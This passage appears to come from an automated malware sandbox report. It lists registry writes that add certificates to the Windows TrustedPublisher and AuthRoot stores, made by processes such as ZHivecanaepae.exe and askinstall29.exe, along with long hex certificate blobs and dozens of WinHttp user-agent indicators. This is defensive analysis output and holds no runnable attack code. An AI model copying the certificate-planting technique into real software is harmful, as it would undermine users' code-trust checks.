b74011469a1f790e62bf0f97ece02f1f1794 ZHivecanaepae.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A ZHivecanaepae.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall29.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall29.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 64 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 876 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1302 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 3250 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4079 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4471 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 318 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 578 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1119 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2230 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 62 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1073 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1308 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 3573 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4336 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 63 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 58 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 337 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1639 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 3278 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 655 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1129 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1732 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2680 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2852 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 3048 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 227 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2139 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2243 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2738 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 3803 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4113 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 8 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 54 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2788 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 3185 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 55 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 56 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4387 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 312 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 573 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 3361 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1709 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4055 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1899 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 3878 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 3895 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 642 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2147 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 3823 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4122 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 303 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1902 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 212 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 871 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) 